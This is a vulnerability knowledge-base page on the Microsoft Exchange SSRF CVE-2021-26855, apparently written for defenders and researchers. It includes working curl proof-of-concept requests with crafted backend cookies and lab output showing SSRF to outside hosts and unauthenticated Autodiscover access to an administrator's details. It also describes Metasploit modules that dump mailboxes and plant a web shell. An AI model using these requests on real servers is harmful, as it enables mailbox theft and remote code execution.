Very High
CVE-2021-26855
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(2 users assessed)High
(2 users assessed)Unknown
Unknown
Unknown
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Microsoft Exchange Server Remote Code Execution Vulnerability
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityHigh
Technical Analysis
CVE-2021-26855
CVE-2021-26855 is an SSRF vulnerability in Exchange that allows privileged access to Exchange’s backend resources, ultimately leading to pre-auth RCE when combined with CVEs such as CVE-2021-27065.
Microsoft’s (Nmap) NSE script
Conveniently disclosed in Microsoft’s alternative mitigations, this script provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.
wvu@kharak:~/Downloads$ ls http-vuln-cve2021-26855.nse wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed Initiating Connect Scan at 00:50 Scanning 192.168.123.183 [1 port] Discovered open port 443/tcp on 192.168.123.183 Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports) NSE: Script scanning 192.168.123.183. Initiating NSE at 00:50 Completed NSE at 00:50, 0.02s elapsed Nmap scan report for 192.168.123.183 Host is up (0.00064s latency). PORT STATE SERVICE 443/tcp open https | http-vuln-cve2021-26855: | VULNERABLE: | Exchange Server SSRF Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2021-26855 | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies. | | Disclosure date: 2021-03-02 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855 |_ http://aka.ms/exchangevulns NSE: Script Post-scanning. Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed Read data files from: /usr/local/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds wvu@kharak:~/Downloads$
Ported to curl(1)…
wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" https://192.168.123.183/owa/auth/x.js * Trying 192.168.123.183... * TCP_NODELAY set * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use h2 * Server certificate: * subject: CN=WIN-T4RO9496TA7 * start date: Mar 8 22:45:17 2021 GMT * expire date: Mar 8 22:45:17 2026 GMT * issuer: CN=WIN-T4RO9496TA7 * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x7f8cb580b400) > GET /owa/auth/x.js HTTP/2 > Host: 192.168.123.183 > User-Agent: curl/7.64.1 > Accept: */* > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; > * Connection state changed (MAX_CONCURRENT_STREAMS == 100)! < HTTP/2 500 < cache-control: private < content-type: text/html; charset=utf-8 < server: Microsoft-IIS/10.0 < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02 < x-calculatedbetarget: localhost < x-calculatedbetarget: localhost < x-feserver: WIN-T4RO9496TA7 < x-aspnet-version: 4.0.30319 < x-powered-by: ASP.NET < date: Tue, 09 Mar 2021 06:52:07 GMT < content-length: 85 < * Connection #0 to host 192.168.123.183 left intact NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0 wvu@kharak:~$
SSRF to an arbitrary remote host
You can specify an arbitrary host in X-AnonResource-Backend
.
wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js" * Trying 192.168.123.183... * TCP_NODELAY set * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use h2 * Server certificate: * subject: CN=WIN-T4RO9496TA7 * start date: Mar 8 22:45:17 2021 GMT * expire date: Mar 8 22:45:17 2026 GMT * issuer: CN=WIN-T4RO9496TA7 * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x7f9ea080d600) > GET /owa/auth/22702.js HTTP/2 > Host: 192.168.123.183 > User-Agent: curl/7.64.1 > Accept: */* > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563 > * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
Catching the request in ncat(1)…
wvu@kharak:~$ ncat -lkv --ssl 443 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72 Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 192.168.123.183. Ncat: Connection from 192.168.123.183:6303. GET /owa/auth/22702.js HTTP/1.1 X-FE-ClientIP: 192.168.123.1 X-Forwarded-For: 192.168.123.1 X-Forwarded-Port: 55723 X-MS-EdgeIP: X-ExCompId: ClientAccessFrontEnd Accept: */* User-Agent: curl/7.64.1 X-OriginalRequestHost: 192.168.123.183 X-OriginalRequestHostSchemePort: 443:https:192.168.123.183 X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P= msExchProxyUri: https://192.168.123.183/owa/auth/22702.js X-IsFromCafe: 1 X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e Host: 192.168.123.1 Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563 Connection: Keep-Alive
The fun folks working on the Nuclei scanner noticed burpcollaborator.net made a good target for their scanner.
wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js" * Trying 192.168.123.183... * TCP_NODELAY set * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use h2 * Server certificate: * subject: CN=WIN-T4RO9496TA7 * start date: Mar 8 22:45:17 2021 GMT * expire date: Mar 8 22:45:17 2026 GMT * issuer: CN=WIN-T4RO9496TA7 * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x7fd58480f600) > GET /owa/auth/18409.js HTTP/2 > Host: 192.168.123.183 > User-Agent: curl/7.64.1 > Accept: */* > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368 > * Connection state changed (MAX_CONCURRENT_STREAMS == 100)! < HTTP/2 200 < cache-control: private < content-type: text/html < server: Microsoft-IIS/10.0 < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8 < x-calculatedbetarget: burpcollaborator.net < x-collaborator-version: 4 < x-aspnet-version: 4.0.30319 < x-powered-by: ASP.NET < date: Tue, 09 Mar 2021 07:58:52 GMT < content-length: 1190 < <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> </head> <body> <h1>Burp Collaborator Server</h1> <p>Burp Collaborator is a service that is used by <a href="https://portswigger.net/burp/">Burp Suite</a> when testing web applications for security vulnerabilities. Some of Burp Suite's tests may cause the application being tested to interact with the Burp Collaborator server, to enable Burp Suite to detect various security vulnerabilities. </p><p>The Burp Collaborator server does not itself initiate any interactions with any system, and only responds to interactions that it receives from other systems. </p><p>If you are a systems administrator and you are seeing interactions with the Burp Collaborator server in your logs, then it is likely that someone is testing your web application using Burp Suite. If you are trying to identify the person responsible for this testing, you should review your web server or applications logs for the time at which these interactions were initiated by your systems. </p><p>For further details about Burp Collaborator, please see the <a href="https://portswigger.net/burp/documentation/collaborator/">full documentation</a>.</p></body> * Connection #0 to host 192.168.123.183 left intact </html>* Closing connection 0 wvu@kharak:~$
SSRF to a privileged backend resource
Hostname WIN-T4RO9496TA7
is from the x-feserver
header.
wvu@kharak:~$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM" "https://192.168.123.183/ecp/$RANDOM.js" * Trying 192.168.123.183... * TCP_NODELAY set * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use h2 * Server certificate: * subject: CN=WIN-T4RO9496TA7 * start date: Mar 8 22:45:17 2021 GMT * expire date: Mar 8 22:45:17 2026 GMT * issuer: CN=WIN-T4RO9496TA7 * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x7faac2808200) > GET /ecp/1849.js HTTP/2 > Host: 192.168.123.183 > User-Agent: curl/7.64.1 > Accept: */* > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406 > * Connection state changed (MAX_CONCURRENT_STREAMS == 100)! < HTTP/2 200 < cache-control: private < content-type: text/html; charset=UTF-8 < server: Microsoft-IIS/10.0 < request-id: b4762a11-d418-43f8-a435-f04420289a4c < x-calculatedbetarget: win-t4ro9496ta7 < x-calculatedbetarget: win-t4ro9496ta7.gibson.local < x-diaginfo: WIN-T4RO9496TA7 < x-beserver: WIN-T4RO9496TA7 < x-feserver: WIN-T4RO9496TA7 < x-aspnet-version: 4.0.30319 < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly < x-powered-by: ASP.NET < x-feserver: WIN-T4RO9496TA7 < date: Tue, 09 Mar 2021 07:00:11 GMT < content-length: 2836 < <HTML lang="en"><HEAD><link rel="alternate" type="text/xml" href="https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id="content" role="main"><h1 class="heading1">Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF="https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test </font>{ <font color="blue"> static void </font>Main() { <font color="black">HelloClient</font> client = <font color="blue">new </font><font color="black">HelloClient</font>(); <font color="darkgreen"> // Use the 'client' variable to call operations on the service. </font><font color="darkgreen"> // Always close the client. </font> client.Close(); } } </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test </font><font color="blue"> Shared Sub </font>Main() <font color="blue"> Dim </font>client As <font color="black">HelloClient</font> = <font color="blue">New </font><font color="black">HelloClient</font>() <font color="darkgreen"> ' Use the 'client' variable to call operations on the service. </font><font color="darkgreen"> ' Always close the client. </font> client.Close() <font color="blue"> End Sub * Connection #0 to host 192.168.123.183 left intact </font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0 wvu@kharak:~$
POST
ing to the EWS endpoint (not shown) allows an attacker access to a target’s mailbox. A sample Autodiscover request is shown below.
wvu@kharak:~/Downloads$ cat poc.xml <?xml version="1.0"?> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>Administrator@gibson.local</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> wvu@kharak:~/Downloads$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM" -H "Content-Type: text/xml" "https://192.168.123.207/ecp/$RANDOM.js" -d @poc.xml * Trying 192.168.123.207... * TCP_NODELAY set * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use h2 * Server certificate: * subject: CN=WIN-T4RO9496TA7 * start date: Mar 8 22:45:17 2021 GMT * expire date: Mar 8 22:45:17 2026 GMT * issuer: CN=WIN-T4RO9496TA7 * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x7fa592808200) > POST /ecp/3425.js HTTP/2 > Host: 192.168.123.207 > User-Agent: curl/7.64.1 > Accept: */* > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753 > Content-Type: text/xml > Content-Length: 354 > * Connection state changed (MAX_CONCURRENT_STREAMS == 100)! * We are completely uploaded and fine < HTTP/2 200 < cache-control: private < content-type: text/xml; charset=utf-8 < server: Microsoft-IIS/10.0 < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1 < x-calculatedbetarget: win-t4ro9496ta7 < x-calculatedbetarget: win-t4ro9496ta7.gibson.local < x-diaginfo: WIN-T4RO9496TA7 < x-beserver: WIN-T4RO9496TA7 < x-feserver: WIN-T4RO9496TA7 < x-aspnet-version: 4.0.30319 < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly < x-powered-by: ASP.NET < x-feserver: WIN-T4RO9496TA7 < date: Wed, 10 Mar 2021 01:26:19 GMT < content-length: 3866 < <?xml version="1.0" encoding="utf-8"?> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006"> <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <User> <DisplayName>Administrator</DisplayName> <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN> <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress> <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId> </User> <Account> <AccountType>email</AccountType> <Action>settings</Action> <MicrosoftOnline>False</MicrosoftOnline> <Protocol> <Type>EXCH</Type> <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server> <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN> <ServerVersion>73C18880</ServerVersion> <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN> <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer> <AD>WIN-T4RO9496TA7.gibson.local</AD> <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl> <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl> <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl> <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl> <EcpUrl-um>?path=/options/callanswering</EcpUrl-um> <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr> <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt> <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret> <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms> <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo> <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm> <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating> <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing> <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall> <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl> <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl> <ServerExclusiveConnect>off</ServerExclusiveConnect> </Protocol> <Protocol> <Type>EXPR</Type> <Server>win-t4ro9496ta7.gibson.local</Server> <SSL>Off</SSL> <AuthPackage>Ntlm</AuthPackage> <ServerExclusiveConnect>on</ServerExclusiveConnect> <CertPrincipalName>None</CertPrincipalName> <GroupingInformation>Default-First-Site-Name</GroupingInformation> </Protocol> <Protocol> <Type>WEB</Type> <Internal> <OWAUrl AuthenticationMethod="Basic, Fba">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl> <Protocol> <Type>EXCH</Type> <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl> </Protocol> </Internal> </Protocol> </Account> </Response> * Connection #0 to host 192.168.123.207 left intact </Autodiscover>* Closing connection 0 wvu@kharak:~/Downloads$
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityHigh
Technical Analysis
Three modules exploiting this vulnerability have been added to Metasploit:
- A scanner module that checks if the target is vulnerable to this Server-Side Request Forgery.
- An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information.
- An exploit module that leverages an unauthenticated Remote Code Execution. This allows execution of arbitrary commands as the SYSTEM user. This module takes advantage of the same SSRF vulnerability and also of a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.
The auxiliary module (2) leverages this SSRF to retrieve the internal Exchange server name and query the Autodiscover service to retrieve other internal data. All of this is done without authentication through the Exchange Admin Center (EAC), usually located at https://<ServerFQDN>/ecp
, so it needs to be accessible. It finally POST
s to the EWS endpoint to dump emails, contacts, etc. Note that this exploit needs at least two Exchange servers to work. One is the host the module directly sends requests to and the other server is the internal resource the SSRF targets.
The exploit module (3) follows the same workflow but retrieves extra information such as the user SID, session ID, canary value, etc. Then, still using the SSRF, the module exploits the arbitrary-file-write vulnerability (CVE-2021-27065) to create a custom .aspx
web page that embeds a web shell. Finally, once this backdoor is planted, it uses it to stage the actual payload and execute it. Note that, for this exploit to work, the email address used needs to be the email address of an Administrator on the Exchange server. It is not really something difficult to obtain, as long as you know the name of an admin and the email pattern used internally.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- exchange server 2013,
- exchange server 2016,
- exchange server 2019
Metasploit Modules
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this report- Government or Industry Alert (https://us-cert.cisa.gov/ncas/alerts/aa21-209a)
- News Article or Blog (https://www.tenable.com/blog/contileaks-chats-reveal-over-30-vulnerabilities-used-by-conti-ransomware-affiliates)
- Other: 2021 Commonly Exploited Vulnerabilities (https://www.ic3.gov/Media/News/2021/210728.pdf)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: